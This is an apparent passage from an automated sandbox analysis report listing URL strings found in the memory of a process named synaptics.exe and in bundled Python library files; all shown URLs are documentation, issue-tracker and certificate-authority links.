Source: synaptics.exe, 0000000C.00000003.1803801964.00000000015B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1774464529.00000000015A2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1949670173.00000000043F0000.00000004.00001000.00020000.00000000.sdmp, ssl_match_hostname.cpython-310.pyc.71153696.12.drString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: synaptics.exe, 0000000C.00000003.1689258541.0000000002170000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1688014912.0000000002369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc7230#section-3.2)
Source: synaptics.exe, 0000000C.00000003.1747587679.0000000001588000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1749727985.0000000002436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.archive.org/web/20200623061726/https://bitbucket.org/pitrou/pathlib/issues/12/
Source: synaptics.exe, 0000000C.00000003.1916003967.0000000002870000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1944341426.0000000002870000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1902234640.000000000243A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1864400413.0000000002870000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1922407233.0000000002870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: synaptics.exe, 0000000C.00000003.1906041657.0000000002428000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1903142280.000000000241E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
Source: synaptics.exe, 0000000C.00000003.1902234640.000000000243A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: synaptics.exe, 0000000C.00000003.1902234640.000000000243A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
Source: synaptics.exe, 0000000C.00000003.1902234640.000000000243A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: synaptics.exe, 0000000C.00000003.1902234640.000000000243A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htmg
Source: synaptics.exe, 0000000C.00000003.1902234640.000000000243A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
Source: synaptics.exe, 0000000C.00000002.1944416307.0000000002884000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1905614319.000000000288F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1904378118.0000000002886000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
Source: synaptics.exe, 0000000C.00000003.1905614319.000000000288F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1904378118.0000000002886000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/11F%
Source: synaptics.exe, 0000000C.00000003.1864400413.0000000002870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/tBS
Source: synaptics.exe, 0000000C.00000003.1710559347.000000000222E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1710384662.0000000002245000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1702374680.0000000001587000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1701342726.0000000002742000.00000004.00000020.00020000.00000000.sdmp, datetime.cpython-310.pyc.40578368.12.drString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
Source: synaptics.exe, 0000000C.00000003.1654469459.0000000001539000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1651369872.0000000001578000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1651694816.0000000001537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.demo2s.com/Tutorial/Cpp/0380__set-multiset/Catalog0380__set-multiset.htm
Source: synaptics.exe, 0000000C.00000003.1864400413.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1871414464.0000000001578000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1917025493.000000000157F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1915787418.00000000028B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1906713042.000000000157F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1897273841.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
Source: synaptics.exe, 0000000C.00000003.1654469459.0000000001539000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1651369872.0000000001578000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1651694816.0000000001537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gnu.org/software/smalltalk/manual-base/html_node/Bag.html
Source: synaptics.exe, 0000000C.00000003.1743273383.000000000242E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/media-types
Source: synaptics.exe, synaptics.exe, 0000000C.00000003.1907412471.000000000219D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1738198080.0000000002370000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1731084338.0000000002322000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1874373294.00000000021AC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1927408676.00000000021AB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1867337464.00000000021A7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1729301051.0000000002369000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1736857629.000000000219F000.00000004.00000020.00020000.00000000.sdmp, ssl.cpython-310.pyc.45298840.12.drString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: synaptics.exe, 0000000C.00000003.1726169107.0000000002351000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1717365828.00000000015B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1710384662.0000000002245000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1712537920.0000000001587000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1715987156.0000000001587000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1702374680.0000000001587000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1727004838.0000000002351000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1714817996.000000000234F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1704677360.0000000002742000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1701342726.0000000002742000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1722262495.0000000001587000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1711353903.00000000015A3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1728125339.00000000015B3000.00000004.00000020.00020000.00000000.sdmp, datetime.cpython-310.pyc.40578368.12.drString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
Source: synaptics.exe, 0000000C.00000003.1710559347.000000000222E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1710384662.0000000002245000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1702374680.0000000001587000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1701342726.0000000002742000.00000004.00000020.00020000.00000000.sdmp, datetime.cpython-310.pyc.40578368.12.drString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
Source: synaptics.exe, 0000000C.00000003.1910070573.0000000001546000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1871414464.0000000001545000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
Source: synaptics.exe, 0000000C.00000002.1937607215.00000000021F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
Source: synaptics.exe, 0000000C.00000003.1871414464.0000000001545000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps61BS
Source: synaptics.exe, 0000000C.00000003.1910070573.0000000001546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps6t
Source: synaptics.exe, 0000000C.00000003.1801944128.0000000002245000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1794795951.000000000243A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1802847834.00000000021A7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1902234640.0000000002448000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1921773262.000000000244C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1800177746.0000000002322000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1823366760.0000000002A8B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1829093531.000000000244C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1797512291.0000000002366000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1802847834.0000000002170000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1908588153.0000000002449000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1793425461.0000000002937000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1809065471.000000000243A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1801577022.0000000002322000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
Source: synaptics.exe, 0000000C.00000003.1850523273.00000000015A2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1847786019.00000000028AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue20164
Source: synaptics.exe, 0000000C.00000003.1685796667.00000000021A7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1687227849.000000000282A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue29255
Source: synaptics.exe, 0000000C.00000003.1678595218.0000000001577000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1678119957.00000000021A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue29302
Source: synaptics.exe, 0000000C.00000003.1635087873.0000000002161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue29585
Source: synaptics.exe, 0000000C.00000003.1669096763.0000000001523000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1666349053.00000000023AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue31672
Source: synaptics.exe, 0000000C.00000003.1747587679.0000000001588000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1749727985.0000000002436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue39682
Source: synaptics.exe, 0000000C.00000003.1702374680.0000000001587000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1701342726.0000000002742000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/msg352381
Source: synaptics.exe, 0000000C.00000003.1779276743.000000000243A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.3/howto/logging.html#configuring-logging-for-a-library
Source: synaptics.exe, 0000000C.00000002.1940759462.00000000025E0000.00000004.00001000.00020000.00000000.sdmp, ssl_.cpython-310.pyc.45584776.12.drString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: synaptics.exe, 0000000C.00000003.1680774295.0000000002369000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1681487449.0000000001577000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/4325783
Source: synaptics.exe, 0000000C.00000003.1778418923.0000000002A01000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1805114848.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1905087147.0000000002A01000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1803801964.00000000015B5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1780230840.00000000015B4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1819220733.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1897201384.0000000002A01000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1798769275.00000000015B4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1779276743.000000000243A000.00000004.00000020.00020000.00000000.sdmp, __init__.cpython-310.pyc.71154848.12.drString found in binary or memory: https://github.com/Ousret/charset_normalizer
Source: synaptics.exe, 0000000C.00000003.1850523273.00000000015A2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1847786019.00000000028AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/psf/requests/issues/1846
Source: synaptics.exe, 0000000C.00000003.1916003967.0000000002860000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1866799112.0000000002860000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1856027303.0000000002872000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1864400413.0000000002860000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/psf/requests/issues/3578.
Source: synaptics.exe, 0000000C.00000003.1857691039.0000000002184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/psf/requests/issues/3772
Source: synaptics.exe, 0000000C.00000003.1855839125.0000000002873000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1864400413.0000000002860000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/psf/requests/pull/2238
Source: synaptics.exe, 0000000C.00000002.1955176505.0000000004E00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/psf/requests/pull/6710
Source: synaptics.exe, 0000000C.00000003.1746467587.0000000002443000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/pyopenssl/pull/933
Source: synaptics.exe, 0000000C.00000002.1934677086.0000000001F60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/417#issuecomment-392298401
Source: synaptics.exe, 0000000C.00000003.1740875328.0000000002323000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1743273383.000000000242E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/113199
Source: synaptics.exe, 0000000C.00000003.1765715869.0000000001588000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1768415687.0000000002438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/pull/7160#discussion_r195405230
Source: synaptics.exe, 0000000C.00000003.1685796667.00000000021A7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1687227849.000000000282A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sethmlarson/selectors2/blob/master/selectors2.py
Source: synaptics.exe, 0000000C.00000003.1640711301.0000000001581000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1638636357.000000000157D000.00000004.00000020.00020000.00000000.sdmp, __init__.cpython-310.pyc.29126072.12.drString found in binary or memory: https://github.com/urllib3/urllib3/issues/2168z(Andrey
Source: synaptics.exe, 0000000C.00000002.1940759462.00000000025E0000.00000004.00001000.00020000.00000000.sdmp, ssl_.cpython-310.pyc.45584776.12.drString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: synaptics.exe, 0000000C.00000003.1860944335.000000000240E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1764732318.0000000002438000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1768415687.0000000002438000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1919649165.0000000002437000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1740875328.0000000002323000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1743273383.000000000242E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1753739046.000000000242E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1746764869.000000000242E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1914730730.0000000002437000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1749727985.0000000002436000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1903142280.000000000241E000.00000004.00000020.00020000.00000000.sdmp, response.cpython-310.pyc.45587416.12.drString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: synaptics.exe, 0000000C.00000002.1948870787.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, poolmanager.cpython-310.pyc.45585856.12.drString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: synaptics.exe, 0000000C.00000003.1638636357.00000000015B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1640711301.0000000001581000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1638636357.000000000157D000.00000004.00000020.00020000.00000000.sdmp, __init__.cpython-310.pyc.29126072.12.drString found in binary or memory: https://github.com/urllib3/urllib3/issues/3020)
Source: synaptics.exe, 0000000C.00000003.1746467587.0000000002443000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3267.
Source: synaptics.exe, 0000000C.00000003.1762228356.00000000015B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1765715869.00000000015B3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1745249203.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1948870787.00000000043A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
Source: synaptics.exe, 0000000C.00000002.1948870787.00000000043A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290p
Source: synaptics.exe, 0000000C.00000003.1743487645.0000000002322000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1743273383.000000000242E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/pull/2624
Source: poolmanager.cpython-310.pyc.45585856.12.drString found in binary or memory: https://google.com/
Source: synaptics.exe, 0000000C.00000003.1919649165.0000000002433000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1914730730.0000000002430000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1860944335.000000000240E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1906041657.0000000002428000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1903142280.000000000241E000.00000004.00000020.00020000.00000000.sdmp, poolmanager.cpython-310.pyc.45585856.12.drString found in binary or memory: https://google.com/mail
Source: synaptics.exe, 0000000C.00000003.1903554609.0000000002238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
Source: synaptics.exe, 0000000C.00000003.1793425461.0000000002978000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1739361059.000000000288E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1739762378.0000000002978000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1739695884.000000000297A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1912742893.0000000002978000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1740875328.0000000002361000.00000004.00000020.00020000.00000000.sdmp, fields.cpython-310.pyc.71107712.12.drString found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: poolmanager.cpython-310.pyc.45585856.12.drString found in binary or memory: https://httpbin.org/
Source: synaptics.exe, 0000000C.00000003.1916003967.0000000002859000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1933003469.0000000001597000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1906713042.0000000001597000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1898262065.000000000223D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1907412471.000000000217F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1857691039.00000000021A7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1859878626.00000000023C8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1926402201.00000000023C8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1863564990.00000000023C6000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1907412471.000000000219D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1899697342.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1856661526.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1871414464.00000000015A2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1909607190.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1928633313.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1918424287.00000000023C2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1917550687.00000000021AB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1912360304.0000000001599000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1861801468.00000000021A8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1930132122.0000000001597000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1861640846.00000000015AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
Source: synaptics.exe, 0000000C.00000003.1914186699.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1686843170.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1643639086.00000000015B9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1638636357.0000000001579000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1672297148.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1747587679.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1774464529.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1831947413.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1640711301.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1788341121.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1655004770.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1694132758.00000000015B4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1928633313.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1689015062.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1933461973.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1871414464.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1717365828.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1745249203.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1696902236.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1638636357.00000000015B7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1711353903.00000000015BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/post
Source: synaptics.exe, 0000000C.00000003.1909083590.000000000236D000.00000004.00000020.00020000.00000000.sdmp, encoder.cpython-310.pyc.71091072.12.dr, __init__.cpython-310.pyc.71090400.12.dr, decoder.cpython-310.pyc.71090592.12.drString found in binary or memory: https://json.org
Source: synaptics.exe, 0000000C.00000003.1818690071.0000000002937000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1819220733.0000000001588000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1819220733.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1954077383.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1819786710.0000000002184000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1808094650.0000000002951000.00000004.00000020.00020000.00000000.sdmp, request.cpython-310.pyc.72644880.12.drString found in binary or memory: https://mahler:8092/site-updates.py
Source: synaptics.exe, 0000000C.00000002.1947474885.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1942147853.0000000002660000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1749284774.0000000002871000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1745673292.0000000002180000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1744500063.0000000002361000.00000004.00000020.00020000.00000000.sdmp, __init__.cpython-310.pyc.71108160.12.drString found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: synaptics.exe, 0000000C.00000002.1976070678.000000006CC74000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://python.org/dev/peps/pep-0263/
Source: synaptics.exe, 0000000C.00000003.1924350622.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1774464529.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1831947413.00000000015BD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1640711301.00000000015B6000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1788341121.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1655004770.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1694132758.00000000015B4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1928633313.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1689015062.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1933461973.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1871414464.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000002.1945918172.0000000002AE0000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1717365828.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1745249203.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1696902236.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1638636357.00000000015B7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 